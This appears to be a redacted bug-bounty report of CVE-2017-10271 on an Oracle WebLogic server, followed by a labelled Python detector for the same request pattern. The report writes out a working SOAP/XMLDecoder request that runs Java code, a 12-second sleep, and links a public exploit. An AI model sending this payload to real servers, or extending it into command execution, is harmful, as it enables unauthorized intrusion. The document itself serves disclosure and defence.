Summary:
Happy Friday! The server at ██████ is vulnerable to CVE-2017-10271 “Oracle WebLogic Server Remote Command Execution”.
Description:
The following request takes 12 seconds (12000 milliseconds) to complete:
POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1
Host: ██████████
Content-Length: 423
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java class="java.beans.XMLDecoder">
<object class="java.lang.Thread" method="sleep">
<long>12000</long>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
This proves that I have Java code execution on the remote server.
Public exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271
I was not able to use that script with a ping command, which might have been blocked by preventing outbound connections.
Patch & possibly don’t allow external access.
Critical, RCE.
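
A defender-side check for the request shape shown in this report, added here as an example and not part of the original report: it flags logged requests under /wls-wsat/ whose SOAP WorkContext header carries an XMLDecoder `<java>` document. The names `inspect_request` and `local` and the finding strings are assumptions of this example; the positive sample is the request body from the report and the benign sample is constructed.

```python
import re
import xml.etree.ElementTree as ET

WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"

def local(tag):
    # Strip the '{namespace}' prefix ElementTree puts on tag names.
    return tag.rsplit("}", 1)[-1]

def inspect_request(path, body):
    """Return findings for one logged HTTP request (URL path + raw body)."""
    if not path.lower().startswith("/wls-wsat/"):
        return []
    findings = ["wls-wsat endpoint reached"]
    # Refuse DTDs before parsing so the detector itself is not exposed to
    # entity-expansion tricks in attacker-controlled XML.
    if re.search(r"<!(DOCTYPE|ENTITY)", body, re.IGNORECASE):
        return findings + ["DTD present, body not parsed"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # Malformed XML: fall back to a coarse marker match.
        if re.search(r"<\s*java[\s>]", body, re.IGNORECASE):
            findings.append("unparseable body containing a <java> element")
        return findings
    for ctx in root.iter("{%s}WorkContext" % WORKAREA_NS):
        for el in ctx.iter():
            if local(el.tag) == "java":
                findings.append("XMLDecoder <java> document in WorkContext")
            elif local(el.tag) == "object" and el.get("class"):
                findings.append("instantiates %s (method=%s)"
                                % (el.get("class"), el.get("method")))
    return findings

# Positive sample: the request body from the report above.
REPORT_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java class="java.beans.XMLDecoder">
<object class="java.lang.Thread" method="sleep">
<long>12000</long>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""
# Constructed benign sample: a SOAP envelope with no WorkContext header.
BENIGN_BODY = ('<e:Envelope xmlns:e="http://schemas.xmlsoap.org/soap/envelope/">'
               '<e:Header/><e:Body/></e:Envelope>')
```

Run it over the path and body fields of proxy or WAF logs; any finding beyond the first line means the WorkContext header is carrying a serialized object graph rather than ordinary transaction context.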